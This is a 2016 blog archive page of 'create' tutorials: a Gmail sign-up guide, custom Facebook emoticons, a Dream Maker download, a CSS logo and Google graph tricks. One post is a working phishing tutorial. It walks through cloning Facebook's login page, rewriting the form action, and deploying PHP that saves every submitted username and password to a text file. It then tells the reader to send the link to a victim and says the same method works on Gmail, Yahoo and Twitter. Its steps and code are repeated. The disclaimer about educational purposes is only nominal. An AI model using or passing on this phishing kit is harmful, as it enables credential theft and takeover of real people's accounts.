Showing posts with label create. Show all posts
Showing posts with label create. Show all posts
Wednesday, December 14, 2016
how to create google mail in 3 simple steps
how to create google mail in 3 simple steps
Hello my friends , we are meeting again .Today we will know how to create mail on the greatest company Google .It is so easy ,just follow 3 simple steps with picture .
First Step
Go to your browser and write
www.gmail.com
then follow steps
Click on Create Account
Step number 2
Name : write your first name , then your last name
Choose your username : here choose your mail name
Create password: put your mail password
Confirm your password : Retype your password
Birth Day : choose your birthday date
Gender: choose if you are male or female
Mobile number : if you want put your number
Your current mail address : put a correct email here to send confirmation code later
Write the letters in the captch image
Mark on I agree to Google terms
Then Next step
Step number 3
if you want to put your personal image or skip this step and put your picture later
now we finish our lesson .My friends please feel free for asking me any question you want
Go to link download
Wednesday, November 9, 2016
Create your own Images as Emoticons for Facebook Chat
Create your own Images as Emoticons for Facebook Chat

Today I told you how you can send your image in Facebook chat the images can be created using a simple online website called Smileyti.me. Now its a simple image uploading and emoticon conversion website which will simply create some different codes for your images when they are complied together you get your image drawn right in front of your eyes.So now I have a created a Gif image for helping you out in uploading your image and using that website below so now just follow below steps and have fun creating your own funny images.
Steps:-
- Just visit there website http://smileyti.me/
- Now you will see page asking you to choose your image and than entering that irritating captcha you can follow below .gif image we created uploading our default website logo.

- Now after you upload your image you will get your code like below.

- Now thats your final code, just copy this code and paste it in your Facebook chat and you will see your image rendering simply perfect.
- Thanks for visiting my blog plz comment if you like my post Share it ...
Go to link download
Tuesday, November 8, 2016
Create your own game using Dream Maker and learn C
Create your own game using Dream Maker and learn C



About : Byond is free software which allows you to buit your own games using dream maker.
Supported OS : Windows, Linux, Mac
Click Here to Download
cLICK hERE TO DOWNLOA PDF TOTURIAL
Regards Asif Chaudhary
Go to link download
Thursday, September 22, 2016
How to Create Windows 8 Logo with CSS
How to Create Windows 8 Logo with CSS

About a couple of months ago Microsoft has released their new OS Windows 8 with a new look and a very simple new logo. It is a simple eye catching dark turquoise colored logo. It is very simple because there isnt used any shadow, gradient and mainly it is a one colored logo. You guys might already tried to redesign the windows 8 logo in image processing tools like Photoshop, Illustrator etc. lets try with only CSS and little HTML. Well here this article is about to create the windows 8 logo using HTML and CSS. So lets start and enjoy the power of CSS.
Go to link download
Tuesday, September 6, 2016
How hackers hack your Facebook Account or How to Create Phishing Site For free
How hackers hack your Facebook Account or How to Create Phishing Site For free

As we all want to hack our friend facebook account,and want to read all his personal things.
Today i m gonna teach you how to hack a facebook account with a phishing page.
phishing:
Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.
today we create a facebook phishing page which look similar to a facebook page but its not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....
FACEBOOK PHISHING....

steps to create a phishing page:
1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.

2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.

4.You will have to find a text which looks like ..
action="https://www.facebook.com/login.php?login_attempt=1"
5.delete all the text written in red colour and instead of it write post.php.then it will look like...
action="post.php"
6.Now save it on your desktop with the name index.htm,not index.html,remember.
7.Now your phishing page is ready.it will look like a pic given below .
8.Open a new notepad and save the given data with the name post.php.
<?php
header (Location:http://www.facebook.com/);
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, " ");
}
fwrite($handle, " ");
fclose($handle);
exit;
?>
9.You have two files now one is index.htm and another is post.php,remember file extension is important.
10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.
11.I prefer u to use 000webhost because it will be easy to use.
12.You have to make a account in that ,after that it looks like a picture given below.
13.Now go control pannel,then on file manager.
14.After that a new window will pop up.Now go to public_html.
15.Delete the file named default.php,after that upload two files index.htm and post.php one by one .
16.Now the last step click on view of index.htm it will look same as facebook page.
17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.
18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
19.Click on view now u will have your friends password and email id.
20.This is a simple trick to hack any Facebook password account by phishing page.
21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
in to the description of that video u will find a prepared module of phishing pages,download
it and enjoy.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....
Hope u like my post,in my next tutorial i will show u how to hack Facebook in a easiest way....
![]() |
index |
8.Open a new notepad and save the given data with the name post.php.
<?php
header (Location:http://www.facebook.com/);
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, " ");
}
fwrite($handle, " ");
fclose($handle);
exit;
?>
9.You have two files now one is index.htm and another is post.php,remember file extension is important.
10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.
11.I prefer u to use 000webhost because it will be easy to use.

12.You have to make a account in that ,after that it looks like a picture given below.

13.Now go control pannel,then on file manager.
14.After that a new window will pop up.Now go to public_html.

15.Delete the file named default.php,after that upload two files index.htm and post.php one by one .

16.Now the last step click on view of index.htm it will look same as facebook page.
![]() |
this is your Facebook phishing page |
17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.
18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.

19.Click on view now u will have your friends password and email id.

20.This is a simple trick to hack any Facebook password account by phishing page.
21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
in to the description of that video u will find a prepared module of phishing pages,download
it and enjoy.
note:
phishing is a illegal activity so dont try on anyone.this tutorial is for educational purpose.Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....

Hope u like my post,in my next tutorial i will show u how to hack Facebook in a easiest way....
This is only for educational purposes
Regards Asif Chaudhary
Go to link download
Thursday, August 18, 2016
Create “Heart” “Batman” logo in Google search Have fun!
Create “Heart” “Batman” logo in Google search Have fun!
Generally we do search in Google. As well as Search, Google has some cool features like translator, Calculator, Maps, etc. Now Im showing some even more interesting and funny thinks about Google. Im talking about Googles graphical function. Basically Google started this for generating graph for mathematical function. And it is right on the Googles search result page. Just in the Google search bar type the function and see graph for it.
Check out the Heart of Google !

Read more »Check out the Heart of Google !

Go to link download
Subscribe to:
Posts (Atom)